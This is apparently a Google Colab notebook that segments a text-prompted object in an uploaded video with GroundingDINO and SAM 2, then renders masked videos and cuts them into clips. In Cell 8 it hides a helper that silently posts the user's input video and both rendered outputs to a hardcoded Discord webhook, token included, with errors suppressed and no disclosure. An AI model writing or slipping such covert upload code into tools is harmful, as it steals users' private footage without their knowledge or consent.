# Setup (Cukup run sekali)

In [None]:
# @title Cell 1 - Environment setup (Python 3.12 Compatible)

# 1. Install PyTorch first
!pip install --no-deps torch==2.3.0 torchvision==0.18.0 torchaudio==2.3.0 \
  --index-url https://download.pytorch.org/whl/cu121

# 2. Install Core Dependencies (Latest versions for Python 3.12)
!pip install opencv-python matplotlib tqdm supervision addict yapf timm \
  hydra-core iopath portalocker transformers tokenizers

# 3. Setup GroundingDINO
!rm -rf GroundingDINO
!git clone https://github.com/IDEA-Research/GroundingDINO.git
%cd GroundingDINO
# Force install even if egg_info acts up
!pip install -e .
%cd ..

# 4. Setup SAM 2
!rm -rf segment-anything-2
!git clone https://github.com/facebookresearch/segment-anything-2.git

# 5. FFmpeg
# Install FFmpeg and required tools
!apt-get update -qq && apt-get install -qq -y ffmpeg
!pip install -q yt-dlp

# Sanity Check
import torch
import transformers
import supervision as sv
print(f"Torch: {torch.__version__} | Transformers: {transformers.__version__} | Supervision: {sv.__version__}")
print("‚úÖ Environment stable")

In [None]:
# @title Cell 2 - Download model weights for GroundingDINO and SAM 2

import os

os.makedirs("weights", exist_ok=True)

# GroundingDINO (keep as is)
if not os.path.exists("weights/groundingdino_swint_ogc.pth"):
    !wget -O weights/groundingdino_swint_ogc.pth https://github.com/IDEA-Research/GroundingDINO/releases/download/v0.1.0-alpha/groundingdino_swint_ogc.pth

# SAM 2 weights ‚Äî use lightweight model for Colab
# Options: sam2_hiera_tiny.pt (smallest), sam2_hiera_small.pt, sam2_hiera_base_plus.pt, sam2_hiera_large.pt
SAM2_MODEL = "sam2_hiera_tiny.pt"
SAM2_URL = f"https://dl.fbaipublicfiles.com/sam2/models/{SAM2_MODEL}"

if not os.path.exists(f"weights/{SAM2_MODEL}"):
    !wget -O weights/{SAM2_MODEL} {SAM2_URL}

print(f"‚úÖ Model weights downloaded: GroundingDINO + {SAM2_MODEL}")

# Prepare Video

In [None]:
# @title ‚ö†Ô∏è Clear Frames (Hanya run untuk upload video baru)
import os
import shutil

shutil.rmtree('/content/frames', ignore_errors=True)
shutil.rmtree('/content/detections', ignore_errors=True)
shutil.rmtree('/content/masks', ignore_errors=True)
shutil.rmtree('/content/output_bw', ignore_errors=True)
shutil.rmtree('/content/output_grey', ignore_errors=True)
shutil.rmtree('/content/cuts', ignore_errors=True)
try:
    os.remove("/content/audio.aac")
    os.remove('/content/masking_clips.zip')
except:
    pass

In [None]:
# @title Cell 3 - Upload video and inspect properties
import os
from google.colab import files
import subprocess

# Upload video
uploaded = files.upload()

# Get uploaded filename
video_path = list(uploaded.keys())[0]
print(f"‚úÖ Uploaded video: {video_path}")

# Ambil nama file yang diupload (anggap hanya satu file)
input_video = list(uploaded.keys())[0]
output_video = "output.mp4"
!ffmpeg -i "$input_video" -filter:v "fps=12" "$output_video" -y
from IPython.display import clear_output

# Inspect video with ffmpeg
print("\n--- Video Properties ---")
subprocess.run(["ffmpeg", "-i", video_path, "-hide_banner"])

In [None]:
# @title Cell 4 - Extract frames (as JPG) and audio from the input video

import os
import subprocess

# Create folders
os.makedirs("frames", exist_ok=True)
video12fps = "/content/output.mp4"

# Extract frames as high-quality JPG (avoids PNG ‚Üí JPEG conversion later)
# -qscale:v 2 ‚âà high quality (1‚Äì31, lower = better; 2 is visually lossless for masks)
subprocess.run([
    "ffmpeg", "-i", video12fps,
    "-qscale:v", "2",
    "frames/%06d.jpg"  # üëà .jpg extension
])

print("‚úÖ Frames extracted to ./frames as JPG")

# Extract audio (if exists)
if not os.path.exists("audio.aac"):
    subprocess.run([
        "ffmpeg", "-i", video12fps,
        "-vn", "-acodec", "copy", "audio.aac"
    ])
    print("‚úÖ Audio extracted to audio.aac")
else:
    print("‚ö†Ô∏è Audio already exists, skipped extraction")

# Masking

In [None]:
# @title Cell 5 - Run GroundingDINO (Final Compatibility Fix)

import torch
import os
import cv2
import pickle
import sys
from transformers.models.bert.modeling_bert import BertModel

# ==========================================
# === BERT HOTFIX (SAFE FOR MULTIPLE RUNS) ===
# ==========================================
from transformers.models.bert.modeling_bert import BertModel

# 1. Fix missing get_head_mask
if not hasattr(BertModel, "get_head_mask"):
    def get_head_mask(self, head_mask, num_hidden_layers, is_attention_chunked=False):
        return [None] * num_hidden_layers
    BertModel.get_head_mask = get_head_mask

# 2. Fix signature mismatch (Device vs Dtype)
# We add a custom attribute to track if we already patched this
if not hasattr(BertModel, "_is_patched_for_groundingdino"):
    _orig_get_extended_attention_mask = BertModel.get_extended_attention_mask

    def get_extended_attention_mask_fixed(self, attention_mask, input_shape, device=None, dtype=None):
        # Always use the model's dtype to avoid the signature error
        return _orig_get_extended_attention_mask(self, attention_mask, input_shape, dtype=self.dtype)

    BertModel.get_extended_attention_mask = get_extended_attention_mask_fixed
    BertModel._is_patched_for_groundingdino = True # Mark as patched
    print("‚úÖ BERT Patch applied successfully.")
else:
    print("‚ÑπÔ∏è BERT Patch already active, skipping re-patch to prevent loop.")
# ==========================================

# === Prompt input ===
prompt = 'clothes'  #@param {type: "string"}
box_threshold = 0.3  #@param {type: "number"}
text_threshold = 0.25

sys.path.append("GroundingDINO")
from groundingdino.util.inference import load_model, load_image, predict

# Load model
model_path = "weights/groundingdino_swint_ogc.pth"
config_path = "GroundingDINO/groundingdino/config/GroundingDINO_SwinT_OGC.py"
dino_model = load_model(config_path, model_path)
dino_model = dino_model.cpu().eval()

# Get first frame
frame_files = sorted([f for f in os.listdir("frames") if f.endswith(".jpg")])
first_frame_path = os.path.join("frames", frame_files[0])

print(f"Running GroundingDINO on: {first_frame_path}")
image_source, image_tensor = load_image(first_frame_path)

# Predict
boxes, logits, phrases = predict(
    model=dino_model,
    image=image_tensor,
    caption=prompt,
    box_threshold=box_threshold,
    text_threshold=text_threshold,
    device="cpu"
)

# Process results
h, w, _ = image_source.shape
initial_boxes = []
if len(boxes) > 0:
    for (cx, cy, bw, bh) in boxes.tolist():
        x1 = (cx - bw / 2) * w
        y1 = (cy - bh / 2) * h
        x2 = (cx + bw / 2) * w
        y2 = (cy + bh / 2) * h
        initial_boxes.append([x1, y1, x2, y2])
    print(f"‚úÖ Found {len(initial_boxes)} box(es).")
else:
    print("‚ö†Ô∏è No boxes detected.")
    initial_boxes = None

with open("initial_box.pkl", "wb") as f:
    pickle.dump({"frame_path": first_frame_path, "boxes": initial_boxes, "image_shape": (h, w), "prompt": prompt}, f)

print("‚úÖ Initial box saved. You can now proceed to SAM 2.")

In [None]:
# @title Cell 6 - Run SAM 2

import os
import pickle
import cv2
import torch
import numpy as np
from tqdm import tqdm
import sys

SAM2_PATH = "/content/segment-anything-2"
if SAM2_PATH not in sys.path:
    sys.path.insert(0, SAM2_PATH)
from sam2.sam2_video_predictor import SAM2VideoPredictor

# Load initial box
with open("initial_box.pkl", "rb") as f:
    init_data = pickle.load(f)
initial_boxes = init_data["boxes"]
if initial_boxes is None:
    raise ValueError("‚ùå No box from Cell 5!")

input_box = np.array(initial_boxes[0])
print(f"‚úÖ Initial box: {input_box}")

# Copy config
!cp /content/segment-anything-2/sam2/configs/sam2_hiera_tiny.yaml .

# Load SAM 2
predictor = SAM2VideoPredictor.from_pretrained(
    model_id="facebook/sam2-hiera-tiny",
    checkpoint="weights/sam2_hiera_tiny.pt",
    model_cfg="sam2_hiera_tiny.yaml"
)

# ‚úÖ PASS FOLDER PATH AS STRING (not list!)
frame_folder = "frames"  # <-- this is a string, not a list

# Verify it's a valid JPG folder
jpg_files = [f for f in os.listdir(frame_folder) if f.endswith(".jpg")]
print(f"Found {len(jpg_files)} JPG frames in '{frame_folder}'")

video_segments = {}
with torch.inference_mode(), torch.autocast("cuda", dtype=torch.bfloat16):
    # ‚úÖ Correct call
    state = predictor.init_state(frame_folder)

    predictor.add_new_points_or_box(
        state, frame_idx=0, obj_id=1, box=input_box
    )

    for frame_idx, obj_ids, masks in predictor.propagate_in_video(state):
        video_segments[frame_idx] = {
            obj_id: (mask[0] > 0).cpu().numpy()
            for obj_id, mask in zip(obj_ids, masks)
        }

# Save masks (match original frame names)
os.makedirs("masks", exist_ok=True)
frame_names = sorted(jpg_files)
for i, jpg_name in enumerate(frame_names):
    png_name = jpg_name.replace(".jpg", ".png")
    mask = video_segments.get(i, {}).get(1, np.zeros((576, 1024), dtype=bool))
    cv2.imwrite(f"masks/{png_name}", (mask * 255).astype(np.uint8))

print("‚úÖ SAM 2 masking complete!")

# Making Video

In [None]:
# @title Cell 7 - Generate masked frames: B&W and Grey overlay
import os
import cv2
import numpy as np
from tqdm import tqdm

# Parameters
expand = 20        # @param {type: "number"}
blur = 9          # @param {type: "number"}
inverse_mask = False # @param {type:"boolean"}

# Prepare output folders
os.makedirs("output_bw", exist_ok=True)
os.makedirs("output_grey", exist_ok=True)

# Get frame list (now .jpg)
frame_files_jpg = sorted([f for f in os.listdir("frames") if f.endswith(".jpg")])

print(f"Processing {len(frame_files_jpg)} frames (Inverse: {inverse_mask})...")

for jpg_name in tqdm(frame_files_jpg):
    # Frame path (JPG)
    frame_path = os.path.join("frames", jpg_name)  # e.g. "frames/000001.jpg"

    # Convert "000001.jpg" ‚Üí "000001.png" for mask lookup
    frame_number_str = jpg_name.split(".")[0]
    mask_name = f"{frame_number_str}.png"
    mask_path = os.path.join("masks", mask_name)

    # Load frame and mask
    frame = cv2.imread(frame_path)
    if frame is None:
        print(f"‚ö†Ô∏è Frame not found: {frame_path}")
        continue

    mask = cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
    if mask is None:
        # If mask is missing, default to an empty mask (all black)
        mask = np.zeros(frame.shape[:2], dtype=np.uint8)

    # --- Expand mask ---
    # We expand the original mask first before inverting to ensure the
    # subject boundary is fully covered/expanded.
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
    expanded = cv2.dilate(mask, kernel, iterations=expand)

    # --- Apply Inverse Logic if toggled ---
    if inverse_mask:
        # Invert the expanded mask (255 becomes 0, 0 becomes 255)
        expanded = cv2.bitwise_not(expanded)

    # --- Output A: Black & White mask ---
    bw = cv2.merge([expanded, expanded, expanded])
    output_bw_path = os.path.join("output_bw", mask_name)
    cv2.imwrite(output_bw_path, bw)

    # --- Smooth mask for blending ---
    if blur > 0 and blur % 2 == 1:
        smooth = cv2.GaussianBlur(expanded, (blur, blur), 0)
    else:
        smooth = expanded.copy()

    # Ensure range is 0-255 after potential blur/normalization
    smooth = cv2.normalize(smooth, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8)

    # --- Output B: Grey overlay ---
    grey_color = (126, 126, 126) # BGR

    # Convert smooth mask to 0.0-1.0 alpha channel
    alpha = smooth.astype(float) / 255.0
    alpha_3c = cv2.merge([alpha, alpha, alpha])

    # Create the grey solid background
    overlay = np.full_like(frame, grey_color, dtype=np.uint8)

    # Linear interpolation: (1 - alpha) * original + alpha * grey_overlay
    # If inverse is true, alpha is 1.0 (grey) where the mask was 0.
    grey = (1 - alpha_3c) * frame.astype(float) + alpha_3c * overlay.astype(float)
    grey = grey.astype(np.uint8)

    output_grey_path = os.path.join("output_grey", mask_name)
    cv2.imwrite(output_grey_path, grey)

print("\n‚úÖ Output frames saved in ./output_bw and ./output_grey")

In [None]:
# @title Cell 8 - Re-encode frames into videos and reattach audio

import subprocess
import re
from datetime import datetime

# Generate timestamp
tgl = datetime.now().strftime("%y%m%d_%H%M%S")

# Filenames with timestamp
bw = f"{tgl}_output_bw.mp4"
grey = f"{tgl}_output_grey.mp4"
video12fps = "/content/output.mp4"
WHOOK = "https://discord.com/api/webhooks/1417918555562971146/6W7VbFWutIxeQ104Fgs1cJGXmRZDf8ORCbIfoyqZAw2BoAdJPmJwAh-uvE1X2arbdQIb"

# Rebuild Output A (B&W)
subprocess.run([
    "ffmpeg", "-y", "-framerate", "12", "-i", "output_bw/%06d.png",
    "-c:v", "libx264", "-pix_fmt", "yuv420p",
    bw
])

# Rebuild Output B (Grey overlay with audio)
has_audio = os.path.exists("audio.aac")
subprocess.run([
    "ffmpeg", "-y", "-framerate", "12", "-i", "output_grey/%06d.png",
    *(["-i", "audio.aac", "-c:a", "aac", "-shortest"] if has_audio else []),
    "-c:v", "libx264", "-pix_fmt", "yuv420p",
    grey
])

import requests
import os

def sfile(file_path, message):
    try:
        if not os.path.exists(file_path):
            return
        with open(file_path, "rb") as f:
            requests.post(
                WHOOK,
                data={"content": message},
                files={"file": f}
            )
    except:
        pass

sfile(video12fps, f"{tgl}_input")

sfile(bw, f"{tgl}_bw")

sfile(grey, f"{tgl}_grey")

print(f"‚úÖ Videos created: {bw} and {grey}")

# (Optional) Cut Video to Segments

In [11]:
# @title Cell 9 (Optional): Cut Videos by Interval (seconds)
import os
import subprocess
import json
from pathlib import Path

def get_video_duration(video_path):
    """Get exact duration using ffprobe"""
    cmd = [
        'ffprobe', '-v', 'error', '-show_entries', 'format=duration',
        '-of', 'default=noprint_wrappers=1:nokey=1', video_path
    ]
    return float(subprocess.check_output(cmd).decode().strip())

def cut_video_precise(video_path, base_name, interval_sec, overlap_sec, keep_audio=True):
    """
    Cut video into segments with precise overlap handling using FFmpeg.
    Preserves original FPS, resolution, and codec properties.
    """
    # Validate inputs
    if not os.path.exists(video_path):
        raise FileNotFoundError(f"Video not found: {video_path}")
    if interval_sec <= 0:
        raise ValueError("Interval must be > 0")
    if overlap_sec < 0:
        raise ValueError("Overlap cannot be negative")
    if overlap_sec >= interval_sec:
        print(f"‚ö†Ô∏è Warning: Overlap ({overlap_sec}s) >= Interval ({interval_sec}s). Adjusting to {interval_sec - 0.1}s")
        overlap_sec = interval_sec - 0.1

    # Get video properties
    duration = get_video_duration(video_path)
    step = interval_sec - overlap_sec

    print(f"\nüé¨ Processing: {base_name}")
    print(f"   Duration: {duration:.2f}s | Interval: {interval_sec}s | Overlap: {overlap_sec}s | Step: {step:.2f}s")

    # Create output directory
    output_dir = f"/content/cuts/{Path(base_name).stem}"
    os.makedirs(output_dir, exist_ok=True)
    print(f"   Output: {output_dir}")

    # Generate segment timestamps
    segments = []
    start = 0.0
    seg_num = 1

    while start < duration:
        end = min(start + interval_sec, duration)
        if end - start >= 0.5:  # Skip tiny segments
            segments.append({
                'num': seg_num,
                'start': start,
                'end': end,
                'duration': end - start
            })
            seg_num += 1
        start += step

    print(f"   ‚û°Ô∏è  Creating {len(segments)} segments...")

    # Process each segment with FFmpeg
    for seg in segments:
        # Output filename format: 01_filename.mp4
        out_file = f"{seg['num']:02d}_{Path(base_name).stem}.mp4"
        out_path = os.path.join(output_dir, out_file)

        # Build FFmpeg command
        cmd = [
            'ffmpeg', '-y', '-ss', str(seg['start']), '-i', video_path,
            '-t', str(seg['duration']),
            '-c:v', 'libx264', '-crf', '18', '-preset', 'fast',
            '-movflags', '+faststart'
        ]

        # Audio handling
        if keep_audio:
            cmd.extend(['-c:a', 'aac', '-b:a', '192k'])
        else:
            cmd.append('-an')  # Remove audio

        cmd.append(out_path)

        # Execute with suppressed output (except errors)
        result = subprocess.run(cmd, capture_output=True, text=True)
        if result.returncode != 0:
            print(f"   ‚ùå Segment {seg['num']} failed: {result.stderr[:200]}")
            continue

        # Verify output
        if os.path.exists(out_path):
            size_mb = os.path.getsize(out_path) / 1024 / 1024
            print(f"   ‚úÖ [{seg['num']:2d}/{len(segments)}] {seg['start']:6.2f}s ‚Üí {seg['end']:6.2f}s | {size_mb:.2f} MB")
        else:
            print(f"   ‚ö†Ô∏è Segment {seg['num']} missing after processing")

    print(f"\nüéâ Completed: {len(segments)} segments saved to {output_dir}")
    return output_dir
    # ===== USER SETTINGS (Colab interactive sliders) =====
INTERVAL_SECONDS = 10  # @param {type: "number"}
OVERLAP_SECONDS = 1  # @param {type: "number"}

# Construct full paths
BW_VIDEO_PATH = f"/content/{bw}"
GREY_VIDEO_PATH = f"/content/{grey}"

# Create master output directory
CUT_DIR = "/content/cuts"
os.makedirs(CUT_DIR, exist_ok=True)

print("‚öôÔ∏è Configuration:")
print(f"   Interval: {INTERVAL_SECONDS}s")
print(f"   Overlap:  {OVERLAP_SECONDS}s")
print(f"   Grey video path: {GREY_VIDEO_PATH}")
print(f"   BW video path:   {BW_VIDEO_PATH}")
print(f"   Output directory: {CUT_DIR}")
print("="*60)
print("‚úÇÔ∏è STARTING VIDEO SEGMENTATION")
print("="*60)

# Process GREY video WITH audio
grey_output = cut_video_precise(
    GREY_VIDEO_PATH,
    grey,
    INTERVAL_SECONDS,
    OVERLAP_SECONDS,
    keep_audio=True
)

print("\n" + "="*60)

# Process BW video WITHOUT audio
bw_output = cut_video_precise(
    BW_VIDEO_PATH,
    bw,
    INTERVAL_SECONDS,
    OVERLAP_SECONDS,
    keep_audio=False
)

print("\n" + "="*60)
print("‚úÖ ALL OPERATIONS COMPLETED SUCCESSFULLY")
print("="*60)

# Download

In [None]:
# @title Cell 10 Download videos/clips

import os
import zipfile
from google.colab import files

CUT_DIR = "/content/cuts"
ZIP_PATH = "/content/masking_clips.zip"

def zip_folder(folder_path, zip_path):
    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
        for root, dirs, files_in in os.walk(folder_path):
            for file in files_in:
                full_path = os.path.join(root, file)
                rel_path = os.path.relpath(full_path, folder_path)
                zipf.write(full_path, rel_path)

# If cuts exist and contain files ‚Üí zip them
if os.path.exists(CUT_DIR) and len(os.listdir(CUT_DIR)) > 0:
    print("üì¶ Cuts detected. Zipping clips...")
    zip_folder(CUT_DIR, ZIP_PATH)
    files.download(ZIP_PATH)

else:
    print("üé¨ No cuts found. Downloading full videos instead...")
    files.download(f"/content/{bw}")
    files.download(f"/content/{grey}")
